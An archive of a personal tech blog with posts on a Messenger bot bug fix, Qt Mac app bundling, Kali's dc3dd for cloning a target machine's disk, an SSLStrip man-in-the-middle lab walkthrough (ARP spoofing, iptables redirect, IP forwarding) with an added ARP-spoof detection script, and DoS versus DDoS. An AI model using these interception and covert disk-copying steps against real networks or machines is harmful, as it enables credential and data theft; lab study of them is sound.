<h1>Heron's Note</h1>
<p><em>Heron Yang</em></p>
<h2>Moved to Medium</h2>
<p><em>2020-05-01</em></p>
<p>I've moved to Medium <a href="http://blog.heron.me/">http://blog.heron.me/</a>. Please follow me there :)</p>
<h2>“(#100) No matching user found” - Facebook Messenger Bot Bug</h2>
<p><em>2016-05-17</em></p>
On May 13th, I found that my Facebook Messenger bot failed to respond to some users. When I read the error log of my webhook process, I got something like:<br />
<pre><code>"error": {
  "message": "(#100) No matching user found",
  "type": "OAuthException",
  "code": 100,
  "fbtrace_id": "XXXXXXXXXXX"
}
</code></pre>
<h3 id="somebackgrounds">
Some Backgrounds</h3>
At this point, the Facebook Messenger Bot platform is still new, so it’s reasonable that it has some bugs. I’m using <code>Node.js</code> for my webhook on <code>Heroku</code>, and I followed the tutorial provided by <a href="https://developers.facebook.com/docs/messenger-platform">Facebook for setting up the bot</a>.<br />
<h3 id="why">
Why?</h3>
Soon, I found this bug being discussed on the Facebook Bug Page <a href="https://developers.facebook.com/bugs/578746852290927/?hc_location=ufi">here</a>. The problem is that Facebook decided to switch the encoding of user and page IDs from ints to strings, which made the example code (template code) on Facebook’s official tutorial page fail to respond to users with string IDs.<br />
<h3 id="then">
Then?</h3>
Facebook sent out notifications to the app developers saying:<br />
<blockquote>
On Tue May 17 format of user and page ids delivered via webhooks will change from an int to a string to better support default json encoder in js (that trims long ints). Please make sure your app works with string ids returned from webhooks as well as with ints.</blockquote>
<h3 id="solution">
Solution</h3>
I believe that Facebook will make the original code in the tutorial work again pretty soon; however, people have already posted a solution online. Here’s the template code that should work:<br />
<pre><code>var express = require('express');
var bodyParser = require('body-parser');
var request = require('request');
var JSONbig = require('json-bigint');
var app = express();

app.set('port', (process.env.PORT || 5000));
app.use(express.static(__dirname + '/public'));
// Keep the body as raw text: json-bigint has to parse it before the default
// JSON parser would round the long numeric IDs.
app.use(bodyParser.text({ type: 'application/json' }));

app.listen(app.get('port'), function () {
  console.log('Node app is running on port', app.get('port'));
});

var token = '<YOUR_TOKEN_HERE>';

function sendTextMessage(sender, text) {
  var messageData = { text: text };
  request({
    url: 'https://graph.facebook.com/v2.6/me/messages',
    qs: { access_token: token },
    method: 'POST',
    json: {
      recipient: { id: sender },
      message: messageData
    }
  }, function (error, response, body) {
    if (error) {
      console.log('Error sending message: ', error);
    } else if (response.body.error) {
      console.log('Error: ', response.body.error);
    }
  });
}

app.post('/webhook/', function (req, res) {
  var data = JSONbig.parse(req.body);
  var messagingEvents = data.entry[0].messaging;
  for (var i = 0; i < messagingEvents.length; i++) {
    var event = messagingEvents[i];
    // The ID may arrive as a string or as a (big) int; always send it back as a string.
    var sender = event.sender.id.toString();
    if (event.message && event.message.text) {
      sendTextMessage(sender, event.message.text);
    }
  }
  res.sendStatus(200);
});
</code></pre>
Make sure you’ve added <code>body-parser</code>, <code>express</code>, <code>json-bigint</code>, and <code>request</code> to your NPM dependencies.<br />
<h3 id="finally">
Finally</h3>
My bot, Ducky, is now working well and is public; feel free to message him here: <a href="http://m.me/ducky.bot">http://m.me/ducky.bot</a>!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://m.me/ducky.bot" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjydMhXQyXrw93dc9EcMjgeoDCMkBdqe_NybBT2-T9c0wb2rbZg1dUfjh4Gop6-37v3MDsb0hY0ZKu_rcjlCctirC0EfCOo6vfAu65vAMQ9mszGjgyZvTCOTxBDgu__y8o-AczlMLg0Grm3/s640/Screen+Shot+2016-05-17+at+3.36.45+PM.png" width="640" /></a></div>
<h2>Qt Mac Application Failed to Create Self-contained App Bundle (Qt Creator Build)</h2>
<p><em>Heron Yang, 2016-05-05</em></p>
<p>Recently, I encountered a problem in creating an app bundle using Qt Creator with Qt 5.6, so I posted my question in detail on StackOverflow <a href="http://stackoverflow.com/questions/36939094/qt-mac-application-failed-to-do-static-linking-development-qt-creator-build/37028995#36939094">here</a>.</p>
<p>In this post, I am going to point out the places I got wrong, and some studies.</p>
<h3 id="scott">Scott</h3>
<p><a href="http://stackoverflow.com/users/676030/scottt">Scott</a> has been a friend of mine for years, and he is the best programmer I’ve ever met in Taiwan. He helped me with this question, and I would like to quote his words here:</p>
<blockquote>Do try to figure out what you did wrong before. Look at the RPATH, install names etc in your executable and update your StackOverflow question with those findings.
Finding out what you did wrong is an important step in understanding a system. This makes your exercise of publishing apps on multiple platforms more meaningful.
</blockquote>
<h3 id="executable_pathloader_pathrpath">@executable_path, @loader_path, @rpath</h3>
<p>The first reason I couldn’t build the app bundle is that I didn’t fully understand the path names used on Mac, so here is my study of @executable_path, @loader_path, and @rpath.</p>
<ul>
<li><code>@executable_path</code>: the folder path of the application’s executable
<ul>
<li>ex. <code>/Applications/Foo.app/Contents/MacOS</code></li>
<li>useful for <em>frameworks embedded inside the application</em></li>
</ul></li>
<li><code>@loader_path</code>: the folder path of the code that loads the library, e.g. the related plug-in
<ul>
<li>ex. <code>/Library/Application Support/Foo/Plug-Ins/Bar.bundle/Contents/MacOS</code></li>
<li>useful for <em>frameworks embedded inside plug-ins</em></li>
<li>available from Mac OS X 10.4</li>
</ul></li>
<li><code>@rpath</code>: instructs the dynamic linker to search a list of paths in order to locate the framework
<ul>
<li>no need to specify the “install path” using either <code>@executable_path</code> or <code>@loader_path</code>; instead, pass additional flags when building the host application (ex. <code>-rpath @executable_path/…/Frameworks</code> or <code>/Library/Frameworks</code>)</li>
<li>available from Mac OS X 10.5</li>
</ul></li>
</ul>
<h3 id="otool">otool</h3>
<p>The second reason I was stuck is that <code>otool</code> doesn’t resolve <code>@rpath</code> names, so I was confused when it always returned the same thing.</p>
<p>However, Scott wrote another version of otool that resolves the rpaths, <a href="https://github.com/scottt/scottt-bin/blob/master/otool-rpath">here</a>. Here are the steps that demonstrate the difference (before and after <code>macdeployqt</code>):</p>
<pre><code>> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)
> otool-rpath bibi.app/Contents/MacOS/bibi
/Users/heron/Qt/5.6/clang_64/lib
> macdeployqt ./*.app -verbose=3 -always-overwrite -appstore-compliant
> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)
> otool-rpath bibi.app/Contents/MacOS/bibi
@executable_path/../Frameworks
</code></pre>
<h3 id="macdeployqt">macdeployqt</h3>
<p>The last reason I failed to understand what’s going on is the output of <code>macdeployqt</code>, which confused me.</p>
<pre><code>> macdeployqt bibi.app
File exists, skip copy: "bibi.app/Contents/PlugIns/platforms/libqcocoa.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/printsupport/libcocoaprintersupport.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqdds.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqgif.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqicns.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqico.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqjpeg.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtga.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtiff.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwbmp.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwebp.dylib"
WARNING:
WARNING: "bibi.app/Contents/Resources/qt.conf" already exists, will not overwrite.
WARNING: To make sure the plugins are loaded from the correct location,
WARNING: please make sure qt.conf contains the following lines:
WARNING: [Paths]
WARNING: Plugins = PlugIns
</code></pre>
<p>However, in Scott’s solution, he passed the following additional arguments:</p>
<ul>
<li><b>-verbose=3</b>: see in detail how the rpaths are updated (<a href="https://gist.github.com/scottt/1d5a12788de97ea93255d25a0c14080e">Scott’s log</a>)</li>
<li><b>-always-overwrite</b>: copy files even if the target file exists, so the first (Scott: I used “always-overwrite” to get predictable results after repeated testing, since the Qt frameworks would be copied into the app bundle.)</li>
<li><b>-appstore-compliant</b>: skip deployment of components that use private API (Scott: appstore-compliant was just for your convenience)</li>
</ul>
<h3 id="test">Test</h3>
<p>Testing is one more thing that made the original question harder to solve: there’s no easy way to check whether my app bundle works on another machine without Qt installed.</p>
<p>Instead of asking friends to run the app, Scott mentioned that we can use <code>lsof</code> at run-time to see which copy of a framework the running process has actually loaded.</p>
<pre><code>> ps aux|grep bibi
heron 21610 0.0 0.5 2632680 40272 ?? S Tue09PM 5:32.80 /Users/heron/Project/bibi/bibi/build-bibi-Desktop_Qt_5_6_0_clang_64bit-Release/bibi.app/Contents/MacOS/bibi
heron 39245 0.0 0.0 2434840 664 s003 R+ 9:31AM 0:00.00 grep --color=auto bibi
> lsof -p 39183 | grep QtCore
bibi 21610 heron txt REG 1,4 6441676 168354669 /Users/heron/Qt-free/5.6/clang_64/lib/QtCore.framework/Versions/5/QtCore
</code></pre>
<p>After <code>macdeployqt</code>, the app bundle no longer needs to link to frameworks outside the bundle:</p>
<pre><code>> ps aux|grep bibi
heron 39352 0.0 0.0 2435864 788 s003 S+ 9:32AM 0:00.00 grep --color=auto bibi
heron 39315 0.0 0.8 2611176 63000 ?? S 9:32AM 0:00.68 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/MacOS/bibi
> lsof -p 39315 | grep QtCore
bibi 39315 heron txt REG 1,4 6017532 171823963 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/Frameworks/QtCore.framework/Versions/5/QtCore
</code></pre>
<h3 id="summary">Summary</h3>
<p>I would say the biggest problem is that I didn’t know how to read <code>@rpath</code>, so Scott’s <code>otool-rpath</code> or <code>lsof</code> helped eventually.</p>
<h3 id="reference">Reference</h3>
<ul>
<li><a href="https://wincent.com/wiki/@executable_path,_@load_path_and_@rpath">@executable_path, @load_path, and @rpath</a></li>
</ul>
<h2>Kali Tool Series - dc3dd</h2>
<p><em>Heron Yang, 2016-04-10</em></p>
<p>“dc3dd is a patched version of GNU dd with added features for computer forensics” - from <a href="http://www.forensicswiki.org/wiki/Dc3dd">ForensicsWiki</a>.</p>
<h3 id="comparisontognudd">Comparison to GNU dd</h3>
<p>While I was using <code>dd</code>, I found it hard to know how long it would take, and whether the cloning had completed without errors. <code>dc3dd</code> addresses these problems by providing:</p>
<ul>
<li>on-the-fly hashing with multiple algorithms (MD5, SHA-1, SHA-256, and SHA-512)</li>
<li>progress reports</li>
<li>writing errors directly to a file</li>
</ul>
<h3 id="whenandwhyusingddordc3dd">When and Why to Use <code>dd</code> or <code>dc3dd</code></h3>
<p>In movies or TV series, we see hackers plug in a USB disk and copy all the data off the machine; that is the case where <code>dd</code> or <code>dc3dd</code> is used.</p>
<p>To be more specific, the flow is:</p>
<ul>
<li>insert a Kali live USB disk into the target machine</li>
<li>do the Kali Forensics Boot</li>
<li><code>dd</code> or <code>dc3dd</code> the disk of the target machine into a file on the Kali USB disk or another USB disk</li>
</ul>
<h3 id="usage">Usage</h3>
<p>I use VMs, so I won’t have a real target machine in this example. However, you can pretend that the disk I am going to clone (<code>/dev/sda5</code>) is the disk of the target machine. I am cloning the disk into a file stored on another USB disk.</p>
<p>First of all, list out the partitions of all the disks.</p>
<pre><code>> fdisk -l
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x7b852532
Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 40136703 40134656 19.1G 83 Linux
/dev/sda2 40138750 41940991 1802242 880M 5 Extended
/dev/sda5 40138752 41940991 1802240 880M 82 Linux swap / Solaris
Disk /dev/sdb: 3.8 GiB, 4026531840 bytes, 7864320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x893a988d
Device Boot Start End Sectors Size Id Type
/dev/sdb1 976 7864319 7863344 3.8G b W95 FAT32
</code></pre>
<p>Pick the one you want to clone later; here I am using the Linux swap partition (<code>/dev/sda5</code>), which is kind of meaningless but enough for practice purposes.</p>
<p>Then, locate the place where you want to save your cloned disk image. Usually, you would want to use another USB disk, since the machine may not belong to you, and what you want to do is clone the disk, save it on the USB disk, then take it away. I will save the file on the <code>/dev/sdb</code> disk, which is mounted at <code>/media/root/0909-B70D/disk-img/</code>.</p>
<p>Start <code>dc3dd</code>:</p>
<pre><code>> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
261455872 bytes ( 249 M ) copied ( 28% ), 33 s, 7.6 M/s
</code></pre>
<ul>
<li><code>if</code>: input disk location</li>
<li><code>of</code>: output image location</li>
<li><code>hash</code>: calculate the hash on the fly</li>
</ul>
<h3 id="verification">Verification</h3>
<p>After the cloning is completed, we can check that the file is exactly the same as the original by comparing the hashes:</p>
<pre><code>> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
922746880 bytes ( 880 M ) copied ( 100% ), 236 s, 3.7 M/s
input results for device `/dev/sda5':
1802240 sectors in
0 bad sectors replaced by zeros
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f (sha256)
output results for file `/media/root/0909-B70D/disk-img/cloned':
1802240 sectors out
dc3dd completed at 2016-04-10 13:00:45 +0800
> file /media/root/0909-B70D/disk-img/cloned
/media/root/0909-B70D/disk-img/cloned: Linux/i386 swap file (new style), version 1 (4K pages), size 225279 pages, no label, UUID=767f785e-d7fb-4b3c-9f8e-b02761db620e
> sha256sum /media/root/0909-B70D/disk-img/cloned
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f /media/root/0909-B70D/disk-img/cloned
</code></pre>
<p>As you can see, the swap partition is copied, and the hashes are the same (f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f).</p>
<h3 id="kaliforensicsboot">Kali Forensics Boot</h3>
<p>By doing the Kali Forensics Boot, one gains the benefit of working silently. That is, the Kali Forensics Boot provides the following features:</p>
<ul>
<li>the internal hard disk is never touched</li>
<li>auto-mounting of removable media is disabled</li>
</ul>
<h3 id="reference">Reference</h3>
<ul>
<li><a href="https://linhost.info/2012/07/copy-and-restore-a-drive-with-dc3dd-gzip-and-a-network-share/">Copy and Restore a Drive with Dc3dd, Gzip and a Network Share</a></li>
<li><a href="http://docs.kali.org/general-use/kali-linux-forensics-mode">Kali Linux Forensics Mode</a></li>
</ul>
<h2>Kali Tool Series - SSLStrip</h2>
<p><em>Heron Yang, 2016-04-06</em></p>
Refer to <a href="http://security.stackexchange.com/questions/41988/how-does-sslstrip-work">“How does SSLstrip work?” on StackExchange</a>: SSLStrip is a type of MitM attack that forces a victim’s browser into communicating with an adversary in plain text over HTTP, while the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip “strips” <code>https://</code> URLs, turning them into <code>http://</code> URLs.<br />
<pre><code>> sslstrip -h
sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
</code></pre>
<h3 id="overview">
Overview</h3>
We will use ARP spoofing in order to obtain the victim’s traffic, which means that the traffic will go through our Kali machine and then be passed on to the victim or to the server he/she is communicating with. Then, we will listen on port 80, the basic HTTP port. All port 80 traffic will be routed to SSLStrip, and SSLStrip will handle the rest of the HTTPS traffic.<br />
The expected result was that the attacker would be able to read the requests between the victim and the HTTPS websites he/she visits, which may contain valuable cookies or passwords. However, in my experiment, SSLStrip crashed, and it seems that this method is out of date.<br />
<h3 id="findthegatewayip">
Find the Gateway IP</h3>
<pre><code>> route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 1024 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
192.168.63.2 0.0.0.0 255.255.255.255 UH 1024 0 0 eth0
</code></pre>
or,<br />
<pre><code>> netstat -nr
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
</code></pre>
So, the Gateway IP is <strong>192.168.63.2</strong> in my case.<br />
<h3 id="findthevictimip">
Find the Victim IP</h3>
Since I run Kali in a VM, the victim will be an Ubuntu server, which is another VM on my machine. On the Ubuntu machine I run:<br />
<pre><code>> ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:4f:5f:5b
inet addr:192.168.63.152 Bcast:192.168.63.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe4f:5f5b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:118 errors:0 dropped:0 overruns:0 frame:0
TX packets:81 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15530 (15.5 KB) TX bytes:14538 (14.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1184 (1.1 KB) TX bytes:1184 (1.1 KB)
</code></pre>
That is, the victim IP is <strong>192.168.63.152</strong>. If you have no access to the victim machine, you can use commands like <code>nmap -sP 192.168.63.0/24</code> to search.<br />
<h3 id="iprouting">
IP Routing</h3>
We are going to redirect Kali’s inbound traffic from 80 to the port SSLStrip is running on (let’s use 5050 here).<br />
<pre><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5050
</code></pre>
To check if the routing rule is set:<br />
<pre><code>> iptables -L -vt nat
Chain PREROUTING (policy ACCEPT 100 packets, 13501 bytes)
pkts bytes target prot opt in out source destination
16 960 REDIRECT tcp -- any any anywhere anywhere tcp dpt:http redir ports 5050
…
</code></pre>
If you want to clean up some mess and reset, here’s the way to clear all PREROUTING rules:<br />
<pre><code>for i in $( iptables -t nat --line-numbers -L | grep ^[0-9] | awk '{ print $1 }' | tac ); do iptables -t nat -D PREROUTING $i; done
</code></pre>
<h3 id="ipforwarding">
IP Forwarding</h3>
Since we are going to do ARP spoofing later, we have to enable IP forwarding first, so that whenever the Kali machine receives packets, it forwards them to their proper destination. We call this MitM (Man in the Middle).<br />
<pre><code>> echo 1 > /proc/sys/net/ipv4/ip_forward
> cat /proc/sys/net/ipv4/ip_forward # check
1
</code></pre>
<h3 id="arpsproof">
ARP Spoof</h3>
Now, in order to let the traffic flow through our Kali machine (MitM), we need ARP spoofing. The syntax is:<br />
<pre><code>> arpspoof -i interface -t target_IP -r gateway_IP
</code></pre>
In our case:<br />
<pre><code>> arpspoof -i eth0 -t 192.168.63.152 -r 192.168.63.2
0:c:29:80:9a:85 0:50:56:e9:3:c 0806 42: arp reply 192.168.63.156 is-at 0:c:29:5a:28:9e
0:c:29:80:9a:85 0:c:29:5a:28:9e 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c
…
</code></pre>
The process is blocking, and we should keep it running.<br />
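Seen from the other side, the spoofing above has a clear signature on the LAN, so here is an added detection example (mine, not from this post or from arpspoof): it parses observations in the <code>arp reply &lt;ip&gt; is-at &lt;mac&gt;</code> form that arpspoof and tcpdump print, builds an IP-to-MAC table, and raises an alert when an IP changes MAC or when one MAC claims both the gateway and another host, which is what <code>-t victim -r gateway</code> produces. The sample lines are constructed, reusing the gateway, victim and Kali addresses from the output in this post; the gateway IP is passed in as a parameter.<br />

```javascript
'use strict';

// Constructed observations in the "arp reply <ip> is-at <mac>" form that
// arpspoof and tcpdump print. The first three are normal; the last two are what
// a host on the LAN sees while the gateway and the victim are being spoofed.
const SAMPLE_ARP_LINES = [
  'arp reply 192.168.63.2 is-at 0:50:56:e9:3:c',
  'arp reply 192.168.63.152 is-at 0:c:29:4f:5f:5b',
  'arp reply 192.168.63.2 is-at 0:50:56:e9:3:c',
  'arp reply 192.168.63.2 is-at 0:c:29:80:9a:85',
  'arp reply 192.168.63.152 is-at 0:c:29:80:9a:85',
];

// tcpdump-style MACs drop leading zeros; canonicalise to aa:bb:cc:dd:ee:ff.
function normalizeMac(mac) {
  const parts = mac.toLowerCase().split(':');
  if (parts.length !== 6 || !parts.every((p) => /^[0-9a-f]{1,2}$/.test(p))) return null;
  return parts.map((p) => p.padStart(2, '0')).join(':');
}

function parseArpReply(line) {
  const m = /arp reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-fA-F:]+)/.exec(line);
  if (!m) return null;
  const mac = normalizeMac(m[2]);
  return mac ? { ip: m[1], mac } : null;
}

// Build an IP -> MAC table from the observations and flag two patterns:
//  - an IP whose MAC changes (someone claims an address already seen), and
//  - one MAC that claims both the gateway and another host, the signature of
//    the two-sided spoof (arpspoof -t victim -r gateway) used in the post.
function detectArpSpoofing(lines, gatewayIp) {
  const table = new Map();   // ip -> mac first seen
  const claims = new Map();  // mac -> set of ips it has claimed
  const alerts = [];
  for (const line of lines) {
    const rep = parseArpReply(line);
    if (!rep) continue;
    const known = table.get(rep.ip);
    if (known === undefined) table.set(rep.ip, rep.mac);
    else if (known !== rep.mac) alerts.push({ kind: 'mac-change', ip: rep.ip, from: known, to: rep.mac });
    if (!claims.has(rep.mac)) claims.set(rep.mac, new Set());
    claims.get(rep.mac).add(rep.ip);
  }
  for (const [mac, ips] of claims) {
    if (ips.has(gatewayIp) && ips.size > 1) {
      alerts.push({ kind: 'gateway-and-host', mac, ips: [...ips].sort() });
    }
  }
  return { table: Object.fromEntries(table), alerts };
}
```

On the sample lines this yields two <code>mac-change</code> alerts (the gateway and the victim both move to the Kali machine’s MAC) and one <code>gateway-and-host</code> alert for that MAC; tools such as arpwatch work from the same kind of table.<br />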
<h3 id="sslstrip">
SSLStrip</h3>
Start SSLStrip on port 5050 (or any port you like, just make sure that matches the one we used in IP Routing).<br />
<pre><code>> sslstrip -l 5050
sslstrip 0.9 by Moxie Marlinspike running...
</code></pre>
<h3 id="victimbrowsehttpswebsites">
Victim Browse HTTPS Websites</h3>
Since my victim only has a command-line interface, I am using <em>lynx</em> as the browser.<br />
<pre><code>> lynx http://www.paypal.com
</code></pre>
On Kali’s Wireshark, we can tell that ARP spoofing is working because all the duplicated packets are shown. (In the screenshot, the upper part was captured while ARP spoofing was off, and all the traffic looks normal. The lower part was captured while ARP spoofing was on; we can see that Kali received all the traffic to/from the victim, 192.168.63.152, and then passed it through.)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfbfoZZAEoylKlmK7rZZppfIBSc79cqSFTLO0405LTumjMfgyYQcVuNjkTDdqfgf7zDD6i_Z1T_P0fnX6GWiu3MqhMVvc6FnNh-Sd1as2X9l3EWKcrG3aOaMvwKvWX_caAn71iAfGC6Ti/s1600/Screen+Shot+2016-04-06+at+3.12.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfbfoZZAEoylKlmK7rZZppfIBSc79cqSFTLO0405LTumjMfgyYQcVuNjkTDdqfgf7zDD6i_Z1T_P0fnX6GWiu3MqhMVvc6FnNh-Sd1as2X9l3EWKcrG3aOaMvwKvWX_caAn71iAfGC6Ti/s640/Screen+Shot+2016-04-06+at+3.12.37+PM.png" width="640" /></a></div>
<br />
<h3 id="sslstripresult">
SSLStrip Result</h3>
SSLStrip crashed right when the user was about to connect to the HTTPS website. I’ve tried the latest SSLStrip 0.9.2, but it crashes in the same way. I also found that other users are suffering from this issue as well: <a href="https://github.com/moxie0/sslstrip/issues/17">sslstrip on non hsts site error #17</a> and <a href="https://github.com/moxie0/sslstrip/issues/15">Execptions in twisted #15</a>.<br />
Here is the error:<br />
<pre><code>sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
File "sslstrip.py", line 105, in main
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1192, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1204, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/epollreactor.py", line 396, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.connectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 484, in connectionLost
self._commonConnection.connectionLost(self, reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 298, in connectionLost
protocol.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 474, in connectionLost
self.handleResponseEnd()
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 485, in handleResponseEnd
self.handleResponse(b)
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 133, in handleResponse
self.client.write(data)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 962, in write
raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called.
</code></pre>
The experiment didn’t work, and I may come back to this if I find something new.<br />
<h3 id="reference">
Reference</h3>
<ul>
<li><a href="https://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/">Using SSLStrip in Kali Linux</a></li>
<li><a href="http://tools.kali.org/information-gathering/sslstrip">Kali Tools - sslstrip</a></li>
<li><a href="http://security.stackexchange.com/questions/41988/how-does-sslstrip-work">“How does SSLstrip work?” on StackExchange</a></li>
<li><a href="http://lubos.rendek.org/remove-all-iptables-prerouting-nat-rules/">Remove All Iptables PREROUTING Nat Rules</a></li>
</ul>
<h2>DoS v.s. DDoS</h2>
<p><em>Heron Yang, 2016-04-06</em></p>
<p>People like to mix up DoS with DDoS, which are similar but different. Referring to <a href="https://en.wikipedia.org/wiki/Denial-of-service_attack">Wikipedia</a>, we get:</p>
<p><strong>DoS</strong>: A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.</p>
<p><strong>DDoS</strong>: A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses.</p>
